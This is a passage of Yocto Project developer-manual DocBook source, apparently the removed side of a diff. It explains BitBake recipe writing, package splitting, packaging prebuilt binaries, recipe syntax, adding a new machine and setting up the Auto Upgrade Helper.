- Some applications might require extra parameters to be passed to the compiler.
- For example, the application might need an additional header path.
- You can accomplish this by adding to the
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-CFLAGS'>CFLAGS</ulink></filename> variable.
- The following example shows this:
- <literallayout class='monospaced'>
- CFLAGS_prepend = "-I ${S}/include "
- </literallayout>
- </para>
-
- <para>
- In the following example, <filename>mtd-utils</filename> is a makefile-based package:
- <literallayout class='monospaced'>
- SUMMARY = "Tools for managing memory technology devices"
- SECTION = "base"
- DEPENDS = "zlib lzo e2fsprogs util-linux"
- HOMEPAGE = "http://www.linux-mtd.infradead.org/"
- LICENSE = "GPLv2+"
- LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
- file://include/common.h;beginline=1;endline=17;md5=ba05b07912a44ea2bf81ce409380049c"
-
- # Use the latest version at 26 Oct, 2013
- SRCREV = "9f107132a6a073cce37434ca9cda6917dd8d866b"
- SRC_URI = "git://git.infradead.org/mtd-utils.git \
- file://add-exclusion-to-mkfs-jffs2-git-2.patch \
- "
-
- PV = "1.5.1+git${SRCPV}"
-
- S = "${WORKDIR}/git"
-
- EXTRA_OEMAKE = "'CC=${CC}' 'RANLIB=${RANLIB}' 'AR=${AR}' 'CFLAGS=${CFLAGS} -I${S}/include -DWITHOUT_XATTR' 'BUILDDIR=${S}'"
-
- do_install () {
- oe_runmake install DESTDIR=${D} SBINDIR=${sbindir} MANDIR=${mandir} INCLUDEDIR=${includedir}
- }
-
- PACKAGES =+ "mtd-utils-jffs2 mtd-utils-ubifs mtd-utils-misc"
-
- FILES_mtd-utils-jffs2 = "${sbindir}/mkfs.jffs2 ${sbindir}/jffs2dump ${sbindir}/jffs2reader ${sbindir}/sumtool"
- FILES_mtd-utils-ubifs = "${sbindir}/mkfs.ubifs ${sbindir}/ubi*"
- FILES_mtd-utils-misc = "${sbindir}/nftl* ${sbindir}/ftl* ${sbindir}/rfd* ${sbindir}/doc* ${sbindir}/serve_image ${sbindir}/recv_image"
-
- PARALLEL_MAKE = ""
-
- BBCLASSEXTEND = "native"
- </literallayout>
- </para>
- </section>
-
- <section id='splitting-an-application-into-multiple-packages'>
- <title>Splitting an Application into Multiple Packages</title>
-
- <para>
- You can use the variables
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGES'>PACKAGES</ulink></filename> and
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'>FILES</ulink></filename>
- to split an application into multiple packages.
- </para>
-
- <para>
- Following is an example that uses the <filename>libxpm</filename> recipe.
- By default, this recipe generates a single package that contains the library along
- with a few binaries.
- You can modify the recipe to split the binaries into separate packages:
- <literallayout class='monospaced'>
- require xorg-lib-common.inc
-
- SUMMARY = "Xpm: X Pixmap extension library"
- LICENSE = "BSD"
- LIC_FILES_CHKSUM = "file://COPYING;md5=51f4270b012ecd4ab1a164f5f4ed6cf7"
- DEPENDS += "libxext libsm libxt"
- PE = "1"
-
- XORG_PN = "libXpm"
-
- PACKAGES =+ "sxpm cxpm"
- FILES_cxpm = "${bindir}/cxpm"
- FILES_sxpm = "${bindir}/sxpm"
- </literallayout>
- </para>
-
- <para>
- In the previous example, we want to ship the <filename>sxpm</filename>
- and <filename>cxpm</filename> binaries in separate packages.
- Since <filename>bindir</filename> would be packaged into the main
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'>PN</ulink></filename>
- package by default, we prepend the <filename>PACKAGES</filename>
- variable so additional package names are added to the start of list.
- This results in the extra <filename>FILES_*</filename>
- variables then containing information that define which files and
- directories go into which packages.
- Files included by earlier packages are skipped by latter packages.
- Thus, the main <filename>PN</filename> package
- does not include the above listed files.
- </para>
- </section>
-
- <section id='packaging-externally-produced-binaries'>
- <title>Packaging Externally Produced Binaries</title>
-
- <para>
- Sometimes, you need to add pre-compiled binaries to an
- image.
- For example, suppose that binaries for proprietary code
- exist, which are created by a particular division of a
- company.
- Your part of the company needs to use those binaries as
- part of an image that you are building using the
- OpenEmbedded build system.
- Since you only have the binaries and not the source code,
- you cannot use a typical recipe that expects to fetch the
- source specified in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- and then compile it.
- </para>
-
- <para>
- One method is to package the binaries and then install them
- as part of the image.
- Generally, it is not a good idea to package binaries
- since, among other things, it can hinder the ability to
- reproduce builds and could lead to compatibility problems
- with ABI in the future.
- However, sometimes you have no choice.
- </para>
-
- <para>
- The easiest solution is to create a recipe that uses
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-bin-package'><filename>bin_package</filename></ulink>
- class and to be sure that you are using default locations
- for build artifacts.
- In most cases, the <filename>bin_package</filename> class
- handles "skipping" the configure and compile steps as well
- as sets things up to grab packages from the appropriate
- area.
- In particular, this class sets <filename>noexec</filename>
- on both the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>
- tasks, sets
- <filename>FILES_${PN}</filename> to "/" so that it picks
- up all files, and sets up a
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
- task, which effectively copies all files from
- <filename>${S}</filename> to <filename>${D}</filename>.
- The <filename>bin_package</filename> class works well when
- the files extracted into <filename>${S}</filename> are
- already laid out in the way they should be laid out
- on the target.
- For more information on these variables, see the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>,
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-D'><filename>D</filename></ulink>
- variables in the Yocto Project Reference Manual's variable
- glossary.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- Using
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
- is a good idea even for components distributed
- in binary form, and is often necessary for
- shared libraries.
- For a shared library, listing the library
- dependencies in
- <filename>DEPENDS</filename> makes sure that
- the libraries are available in the staging
- sysroot when other recipes link against the
- library, which might be necessary for
- successful linking.
- </para></listitem>
- <listitem><para>
- Using <filename>DEPENDS</filename> also
- allows runtime dependencies between packages
- to be added automatically.
- See the
- "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
- section in the Yocto Project Overview and
- Concepts Manual for more information.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- If you cannot use the <filename>bin_package</filename>
- class, you need to be sure you are doing the following:
- <itemizedlist>
- <listitem><para>
- Create a recipe where the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>
- tasks do nothing:
- It is usually sufficient to just not define these
- tasks in the recipe, because the default
- implementations do nothing unless a Makefile is
- found in
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink><filename>}</filename>.
- </para>
-
- <para>If
- <filename>${S}</filename> might contain a Makefile,
- or if you inherit some class that replaces
- <filename>do_configure</filename> and
- <filename>do_compile</filename> with custom
- versions, then you can use the
- <filename>[</filename><ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'><filename>noexec</filename></ulink><filename>]</filename>
- flag to turn the tasks into no-ops, as follows:
- <literallayout class='monospaced'>
- do_configure[noexec] = "1"
- do_compile[noexec] = "1"
- </literallayout>
- Unlike
- <ulink url='&YOCTO_DOCS_BB_URL;#deleting-a-task'><filename>deleting the tasks</filename></ulink>,
- using the flag preserves the dependency chain from
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-fetch'><filename>do_fetch</filename></ulink>, <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-unpack'><filename>do_unpack</filename></ulink>,
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
- tasks to the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
- task.
- </para></listitem>
- <listitem><para>Make sure your
- <filename>do_install</filename> task installs the
- binaries appropriately.
- </para></listitem>
- <listitem><para>Ensure that you set up
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES</filename></ulink>
- (usually
- <filename>FILES_${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>)
- to point to the files you have installed, which of
- course depends on where you have installed them
- and whether those files are in different locations
- than the defaults.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id="following-recipe-style-guidelines">
- <title>Following Recipe Style Guidelines</title>
-
- <para>
- When writing recipes, it is good to conform to existing
- style guidelines.
- The
- <ulink url='http://www.openembedded.org/wiki/Styleguide'>OpenEmbedded Styleguide</ulink>
- wiki page provides rough guidelines for preferred recipe style.
- </para>
-
- <para>
- It is common for existing recipes to deviate a bit from this
- style.
- However, aiming for at least a consistent style is a good idea.
- Some practices, such as omitting spaces around
- <filename>=</filename> operators in assignments or ordering
- recipe components in an erratic way, are widely seen as poor
- style.
- </para>
- </section>
-
- <section id='recipe-syntax'>
- <title>Recipe Syntax</title>
-
- <para>
- Understanding recipe file syntax is important for writing
- recipes.
- The following list overviews the basic items that make up a
- BitBake recipe file.
- For more complete BitBake syntax descriptions, see the
- "<ulink url='&YOCTO_DOCS_BB_URL;#bitbake-user-manual-metadata'>Syntax and Operators</ulink>"
- chapter of the BitBake User Manual.
- <itemizedlist>
- <listitem><para>
- <emphasis>Variable Assignments and Manipulations:</emphasis>
- Variable assignments allow a value to be assigned to a
- variable.
- The assignment can be static text or might include
- the contents of other variables.
- In addition to the assignment, appending and prepending
- operations are also supported.</para>
-
- <para>The following example shows some of the ways
- you can use variables in recipes:
- <literallayout class='monospaced'>
- S = "${WORKDIR}/postfix-${PV}"
- CFLAGS += "-DNO_ASM"
- SRC_URI_append = " file://fixup.patch"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Functions:</emphasis>
- Functions provide a series of actions to be performed.
- You usually use functions to override the default
- implementation of a task function or to complement
- a default function (i.e. append or prepend to an
- existing function).
- Standard functions use <filename>sh</filename> shell
- syntax, although access to OpenEmbedded variables and
- internal methods are also available.</para>
-
- <para>The following is an example function from the
- <filename>sed</filename> recipe:
- <literallayout class='monospaced'>
- do_install () {
- autotools_do_install
- install -d ${D}${base_bindir}
- mv ${D}${bindir}/sed ${D}${base_bindir}/sed
- rmdir ${D}${bindir}/
- }
- </literallayout>
- It is also possible to implement new functions that
- are called between existing tasks as long as the
- new functions are not replacing or complementing the
- default functions.
- You can implement functions in Python
- instead of shell.
- Both of these options are not seen in the majority of
- recipes.
- </para></listitem>
- <listitem><para><emphasis>Keywords:</emphasis>
- BitBake recipes use only a few keywords.
- You use keywords to include common
- functions (<filename>inherit</filename>), load parts
- of a recipe from other files
- (<filename>include</filename> and
- <filename>require</filename>) and export variables
- to the environment (<filename>export</filename>).
- </para>
-
- <para>The following example shows the use of some of
- these keywords:
- <literallayout class='monospaced'>
- export POSTCONF = "${STAGING_BINDIR}/postconf"
- inherit autoconf
- require otherfile.inc
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Comments (#):</emphasis>
- Any lines that begin with the hash character
- (<filename>#</filename>) are treated as comment lines
- and are ignored:
- <literallayout class='monospaced'>
- # This is a comment
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- This next list summarizes the most important and most commonly
- used parts of the recipe syntax.
- For more information on these parts of the syntax, you can
- reference the
- <ulink url='&YOCTO_DOCS_BB_URL;#bitbake-user-manual-metadata'>Syntax and Operators</ulink>
- chapter in the BitBake User Manual.
- <itemizedlist>
- <listitem><para>
- <emphasis>Line Continuation (\):</emphasis>
- Use the backward slash (<filename>\</filename>)
- character to split a statement over multiple lines.
- Place the slash character at the end of the line that
- is to be continued on the next line:
- <literallayout class='monospaced'>
- VAR = "A really long \
- line"
- </literallayout>
- <note>
- You cannot have any characters including spaces
- or tabs after the slash character.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Using Variables (${<replaceable>VARNAME</replaceable>}):</emphasis>
- Use the <filename>${<replaceable>VARNAME</replaceable>}</filename>
- syntax to access the contents of a variable:
- <literallayout class='monospaced'>
- SRC_URI = "${SOURCEFORGE_MIRROR}/libpng/zlib-${PV}.tar.gz"
- </literallayout>
- <note>
- It is important to understand that the value of a
- variable expressed in this form does not get
- substituted automatically.
- The expansion of these expressions happens
- on-demand later (e.g. usually when a function that
- makes reference to the variable executes).
- This behavior ensures that the values are most
- appropriate for the context in which they are
- finally used.
- On the rare occasion that you do need the variable
- expression to be expanded immediately, you can use
- the <filename>:=</filename> operator instead of
- <filename>=</filename> when you make the
- assignment, but this is not generally needed.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Quote All Assignments ("<replaceable>value</replaceable>"):</emphasis>
- Use double quotes around values in all variable
- assignments (e.g.
- <filename>"<replaceable>value</replaceable>"</filename>).
- Following is an example:
- <literallayout class='monospaced'>
- VAR1 = "${OTHERVAR}"
- VAR2 = "The version is ${PV}"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Conditional Assignment (?=):</emphasis>
- Conditional assignment is used to assign a
- value to a variable, but only when the variable is
- currently unset.
- Use the question mark followed by the equal sign
- (<filename>?=</filename>) to make a "soft" assignment
- used for conditional assignment.
- Typically, "soft" assignments are used in the
- <filename>local.conf</filename> file for variables
- that are allowed to come through from the external
- environment.
- </para>
-
- <para>Here is an example where
- <filename>VAR1</filename> is set to "New value" if
- it is currently empty.
- However, if <filename>VAR1</filename> has already been
- set, it remains unchanged:
- <literallayout class='monospaced'>
- VAR1 ?= "New value"
- </literallayout>
- In this next example, <filename>VAR1</filename>
- is left with the value "Original value":
- <literallayout class='monospaced'>
- VAR1 = "Original value"
- VAR1 ?= "New value"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Appending (+=):</emphasis>
- Use the plus character followed by the equals sign
- (<filename>+=</filename>) to append values to existing
- variables.
- <note>
- This operator adds a space between the existing
- content of the variable and the new content.
- </note></para>
-
- <para>Here is an example:
- <literallayout class='monospaced'>
- SRC_URI += "file://fix-makefile.patch"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Prepending (=+):</emphasis>
- Use the equals sign followed by the plus character
- (<filename>=+</filename>) to prepend values to existing
- variables.
- <note>
- This operator adds a space between the new content
- and the existing content of the variable.
- </note></para>
-
- <para>Here is an example:
- <literallayout class='monospaced'>
- VAR =+ "Starts"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Appending (_append):</emphasis>
- Use the <filename>_append</filename> operator to
- append values to existing variables.
- This operator does not add any additional space.
- Also, the operator is applied after all the
- <filename>+=</filename>, and
- <filename>=+</filename> operators have been applied and
- after all <filename>=</filename> assignments have
- occurred.
- </para>
-
- <para>The following example shows the space being
- explicitly added to the start to ensure the appended
- value is not merged with the existing value:
- <literallayout class='monospaced'>
- SRC_URI_append = " file://fix-makefile.patch"
- </literallayout>
- You can also use the <filename>_append</filename>
- operator with overrides, which results in the actions
- only being performed for the specified target or
- machine:
- <literallayout class='monospaced'>
- SRC_URI_append_sh4 = " file://fix-makefile.patch"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Prepending (_prepend):</emphasis>
- Use the <filename>_prepend</filename> operator to
- prepend values to existing variables.
- This operator does not add any additional space.
- Also, the operator is applied after all the
- <filename>+=</filename>, and
- <filename>=+</filename> operators have been applied and
- after all <filename>=</filename> assignments have
- occurred.
- </para>
-
- <para>The following example shows the space being
- explicitly added to the end to ensure the prepended
- value is not merged with the existing value:
- <literallayout class='monospaced'>
- CFLAGS_prepend = "-I${S}/myincludes "
- </literallayout>
- You can also use the <filename>_prepend</filename>
- operator with overrides, which results in the actions
- only being performed for the specified target or
- machine:
- <literallayout class='monospaced'>
- CFLAGS_prepend_sh4 = "-I${S}/myincludes "
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Overrides:</emphasis>
- You can use overrides to set a value conditionally,
- typically based on how the recipe is being built.
- For example, to set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KBRANCH'><filename>KBRANCH</filename></ulink>
- variable's value to "standard/base" for any target
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>,
- except for qemuarm where it should be set to
- "standard/arm-versatile-926ejs", you would do the
- following:
- <literallayout class='monospaced'>
- KBRANCH = "standard/base"
- KBRANCH_qemuarm = "standard/arm-versatile-926ejs"
- </literallayout>
- Overrides are also used to separate alternate values
- of a variable in other situations.
- For example, when setting variables such as
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILES'><filename>FILES</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>
- that are specific to individual packages produced by
- a recipe, you should always use an override that
- specifies the name of the package.
- </para></listitem>
- <listitem><para>
- <emphasis>Indentation:</emphasis>
- Use spaces for indentation rather than than tabs.
- For shell functions, both currently work.
- However, it is a policy decision of the Yocto Project
- to use tabs in shell functions.
- Realize that some layers have a policy to use spaces
- for all indentation.
- </para></listitem>
- <listitem><para>
- <emphasis>Using Python for Complex Operations:</emphasis>
- For more advanced processing, it is possible to use
- Python code during variable assignments (e.g.
- search and replacement on a variable).</para>
-
- <para>You indicate Python code using the
- <filename>${@<replaceable>python_code</replaceable>}</filename>
- syntax for the variable assignment:
- <literallayout class='monospaced'>
- SRC_URI = "ftp://ftp.info-zip.org/pub/infozip/src/zip${@d.getVar('PV',1).replace('.', '')}.tgz
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Shell Function Syntax:</emphasis>
- Write shell functions as if you were writing a shell
- script when you describe a list of actions to take.
- You should ensure that your script works with a generic
- <filename>sh</filename> and that it does not require
- any <filename>bash</filename> or other shell-specific
- functionality.
- The same considerations apply to various system
- utilities (e.g. <filename>sed</filename>,
- <filename>grep</filename>, <filename>awk</filename>,
- and so forth) that you might wish to use.
- If in doubt, you should check with multiple
- implementations - including those from BusyBox.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id="platdev-newmachine">
- <title>Adding a New Machine</title>
-
- <para>
- Adding a new machine to the Yocto Project is a straightforward
- process.
- This section describes how to add machines that are similar
- to those that the Yocto Project already supports.
- <note>
- Although well within the capabilities of the Yocto Project,
- adding a totally new architecture might require
- changes to <filename>gcc/glibc</filename> and to the site
- information, which is beyond the scope of this manual.
- </note>
- </para>
-
- <para>
- For a complete example that shows how to add a new machine,
- see the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#creating-a-new-bsp-layer-using-the-bitbake-layers-script'>Creating a New BSP Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
- section in the Yocto Project Board Support Package (BSP)
- Developer's Guide.
- </para>
-
- <section id="platdev-newmachine-conffile">
- <title>Adding the Machine Configuration File</title>
-
- <para>
- To add a new machine, you need to add a new machine
- configuration file to the layer's
- <filename>conf/machine</filename> directory.
- This configuration file provides details about the device
- you are adding.
- </para>
-
- <para>
- The OpenEmbedded build system uses the root name of the
- machine configuration file to reference the new machine.
- For example, given a machine configuration file named
- <filename>crownbay.conf</filename>, the build system
- recognizes the machine as "crownbay".
- </para>
-
- <para>
- The most important variables you must set in your machine
- configuration file or include from a lower-level configuration
- file are as follows:
- <itemizedlist>
- <listitem><para><filename><ulink url='&YOCTO_DOCS_REF_URL;#var-TARGET_ARCH'>TARGET_ARCH</ulink></filename>
- (e.g. "arm")</para></listitem>
- <listitem><para><filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_PROVIDER'>PREFERRED_PROVIDER</ulink>_virtual/kernel</filename>
- </para></listitem>
- <listitem><para><filename><ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_FEATURES'>MACHINE_FEATURES</ulink></filename>
- (e.g. "apm screen wifi")</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- You might also need these variables:
- <itemizedlist>
- <listitem><para><filename><ulink url='&YOCTO_DOCS_REF_URL;#var-SERIAL_CONSOLES'>SERIAL_CONSOLES</ulink></filename>
- (e.g. "115200;ttyS0 115200;ttyS1")</para></listitem>
- <listitem><para><filename><ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_IMAGETYPE'>KERNEL_IMAGETYPE</ulink></filename>
- (e.g. "zImage")</para></listitem>
- <listitem><para><filename><ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FSTYPES'>IMAGE_FSTYPES</ulink></filename>
- (e.g. "tar.gz jffs2")</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- You can find full details on these variables in the reference
- section.
- You can leverage existing machine <filename>.conf</filename>
- files from <filename>meta-yocto-bsp/conf/machine/</filename>.
- </para>
- </section>
-
- <section id="platdev-newmachine-kernel">
- <title>Adding a Kernel for the Machine</title>
-
- <para>
- The OpenEmbedded build system needs to be able to build a kernel
- for the machine.
- You need to either create a new kernel recipe for this machine,
- or extend an existing kernel recipe.
- You can find several kernel recipe examples in the
- Source Directory at
- <filename>meta/recipes-kernel/linux</filename>
- that you can use as references.
- </para>
-
- <para>
- If you are creating a new kernel recipe, normal recipe-writing
- rules apply for setting up a
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'>SRC_URI</ulink></filename>.
- Thus, you need to specify any necessary patches and set
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-S'>S</ulink></filename>
- to point at the source code.
- You need to create a <filename>do_configure</filename> task that
- configures the unpacked kernel with a
- <filename>defconfig</filename> file.
- You can do this by using a <filename>make defconfig</filename>
- command or, more commonly, by copying in a suitable
- <filename>defconfig</filename> file and then running
- <filename>make oldconfig</filename>.
- By making use of <filename>inherit kernel</filename> and
- potentially some of the <filename>linux-*.inc</filename> files,
- most other functionality is centralized and the defaults of the
- class normally work well.
- </para>
-
- <para>
- If you are extending an existing kernel recipe, it is usually
- a matter of adding a suitable <filename>defconfig</filename>
- file.
- The file needs to be added into a location similar to
- <filename>defconfig</filename> files used for other machines
- in a given kernel recipe.
- A possible way to do this is by listing the file in the
- <filename>SRC_URI</filename> and adding the machine to the
- expression in
- <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-COMPATIBLE_MACHINE'>COMPATIBLE_MACHINE</ulink></filename>:
- <literallayout class='monospaced'>
- COMPATIBLE_MACHINE = '(qemux86|qemumips)'
- </literallayout>
- For more information on <filename>defconfig</filename> files,
- see the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#changing-the-configuration'>Changing the Configuration</ulink>"
- section in the Yocto Project Linux Kernel Development Manual.
- </para>
- </section>
-
- <section id="platdev-newmachine-formfactor">
- <title>Adding a Formfactor Configuration File</title>
-
- <para>
- A formfactor configuration file provides information about the
- target hardware for which the image is being built and information that
- the build system cannot obtain from other sources such as the kernel.
- Some examples of information contained in a formfactor configuration file include
- framebuffer orientation, whether or not the system has a keyboard,
- the positioning of the keyboard in relation to the screen, and
- the screen resolution.
- </para>
-
- <para>
- The build system uses reasonable defaults in most cases.
- However, if customization is
- necessary, you need to create a <filename>machconfig</filename> file
- in the <filename>meta/recipes-bsp/formfactor/files</filename>
- directory.
- This directory contains directories for specific machines such as
- <filename>qemuarm</filename> and <filename>qemux86</filename>.
- For information about the settings available and the defaults, see the
- <filename>meta/recipes-bsp/formfactor/files/config</filename> file found in the
- same area.
- </para>
-
- <para>
- Following is an example for "qemuarm" machine:
- <literallayout class='monospaced'>
- HAVE_TOUCHSCREEN=1
- HAVE_KEYBOARD=1
-
- DISPLAY_CAN_ROTATE=0
- DISPLAY_ORIENTATION=0
- #DISPLAY_WIDTH_PIXELS=640
- #DISPLAY_HEIGHT_PIXELS=480
- #DISPLAY_BPP=16
- DISPLAY_DPI=150
- DISPLAY_SUBPIXEL_ORDER=vrgb
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id='gs-upgrading-recipes'>
- <title>Upgrading Recipes</title>
-
- <para>
- Over time, upstream developers publish new versions for software
- built by layer recipes.
- It is recommended to keep recipes up-to-date with upstream
- version releases.
- </para>
-
- <para>
- While several methods exist that allow you upgrade a recipe,
- you might consider checking on the upgrade status of a recipe
- first.
- You can do so using the
- <filename>devtool check-upgrade-status</filename> command.
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#devtool-checking-on-the-upgrade-status-of-a-recipe'>Checking on the Upgrade Status of a Recipe</ulink>"
- section in the Yocto Project Reference Manual for more information.
- </para>
-
- <para>
- The remainder of this section describes three ways you can
- upgrade a recipe.
- You can use the Automated Upgrade Helper (AUH) to set up
- automatic version upgrades.
- Alternatively, you can use <filename>devtool upgrade</filename>
- to set up semi-automatic version upgrades.
- Finally, you can manually upgrade a recipe by editing the
- recipe itself.
- </para>
-
- <section id='gs-using-the-auto-upgrade-helper'>
- <title>Using the Auto Upgrade Helper (AUH)</title>
-
- <para>
- The AUH utility works in conjunction with the
- OpenEmbedded build system in order to automatically generate
- upgrades for recipes based on new versions being
- published upstream.
- Use AUH when you want to create a service that performs the
- upgrades automatically and optionally sends you an email with
- the results.
- </para>
-
- <para>
- AUH allows you to update several recipes with a single use.
- You can also optionally perform build and integration tests
- using images with the results saved to your hard drive and
- emails of results optionally sent to recipe maintainers.
- Finally, AUH creates Git commits with appropriate commit
- messages in the layer's tree for the changes made to recipes.
- <note>
- Conditions do exist when you should not use AUH to upgrade
- recipes and you should instead use either
- <filename>devtool upgrade</filename> or upgrade your
- recipes manually:
- <itemizedlist>
- <listitem><para>
- When AUH cannot complete the upgrade sequence.
- This situation usually results because custom
- patches carried by the recipe cannot be
- automatically rebased to the new version.
- In this case, <filename>devtool upgrade</filename>
- allows you to manually resolve conflicts.
- </para></listitem>
- <listitem><para>
- When for any reason you want fuller control over
- the upgrade process.
- For example, when you want special arrangements
- for testing.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- The following steps describe how to set up the AUH utility:
- <orderedlist>
- <listitem><para>
- <emphasis>Be Sure the Development Host is Set Up:</emphasis>
- You need to be sure that your development host is
- set up to use the Yocto Project.
- For information on how to set up your host, see the
- "<link linkend='dev-preparing-the-build-host'>Preparing the Build Host</link>"
- section.
- </para></listitem>
- <listitem><para>
- <emphasis>Make Sure Git is Configured:</emphasis>
- The AUH utility requires Git to be configured because
- AUH uses Git to save upgrades.
- Thus, you must have Git user and email configured.
- The following command shows your configurations:
- <literallayout class='monospaced'>
- $ git config --list
- </literallayout>
- If you do not have the user and email configured, you
- can use the following commands to do so:
- <literallayout class='monospaced'>
- $ git config --global user.name <replaceable>some_name</replaceable>
- $ git config --global user.email <replaceable>username</replaceable>@<replaceable>domain</replaceable>.com
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Clone the AUH Repository:</emphasis>
- To use AUH, you must clone the repository onto your
- development host.
- The following command uses Git to create a local
- copy of the repository on your system:
- <literallayout class='monospaced'>
- $ git clone git://git.yoctoproject.org/auto-upgrade-helper
- Cloning into 'auto-upgrade-helper'...
- remote: Counting objects: 768, done.
- remote: Compressing objects: 100% (300/300), done.
- remote: Total 768 (delta 499), reused 703 (delta 434)
- Receiving objects: 100% (768/768), 191.47 KiB | 98.00 KiB/s, done.
- Resolving deltas: 100% (499/499), done.
- Checking connectivity... done.
- </literallayout>
- AUH is not part of the
- <ulink url='&YOCTO_DOCS_REF_URL;#oe-core'>OpenEmbedded-Core (OE-Core)</ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#poky'>Poky</ulink>
- repositories.
- </para></listitem>
- <listitem><para>
- <emphasis>Create a Dedicated Build Directory:</emphasis>
- Run the
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>oe-init-build-env</filename></ulink>
- script to create a fresh build directory that you
- use exclusively for running the AUH utility:
- <literallayout class='monospaced'>
- $ cd ~/poky
- $ source oe-init-build-env <replaceable>your_AUH_build_directory</replaceable>
- </literallayout>
- Re-using an existing build directory and its
- configurations is not recommended as existing settings
- could cause AUH to fail or behave undesirably.
- </para></listitem>
- <listitem><para>
- <emphasis>Make Configurations in Your Local Configuration File:</emphasis>
- Several settings need to exist in the
- <filename>local.conf</filename> file in the build
- directory you just created for AUH.
- Make these following configurations:
- <itemizedlist>
- <listitem><para>
- If you want to enable
- <ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-build-output-quality'>Build History</ulink>,
- which is optional, you need the following
- lines in the
- <filename>conf/local.conf</filename> file:
- <literallayout class='monospaced'>
- INHERIT =+ "buildhistory"
- BUILDHISTORY_COMMIT = "1"
- </literallayout>
- With this configuration and a successful
- upgrade, a build history "diff" file appears in
- the
- <filename>upgrade-helper/work/recipe/buildhistory-diff.txt</filename>
- file found in your build directory.
- </para></listitem>
- <listitem><para>
- If you want to enable testing through the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-testimage*'><filename>testimage</filename></ulink>
- class, which is optional, you need to have the
- following set in your
- <filename>conf/local.conf</filename> file:
- <literallayout class='monospaced'>
- INHERIT += "testimage"
- </literallayout>
- <note>
- If your distro does not enable by default
- ptest, which Poky does, you need the
- following in your
- <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- DISTRO_FEATURES_append = " ptest"
- </literallayout>
- </note>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
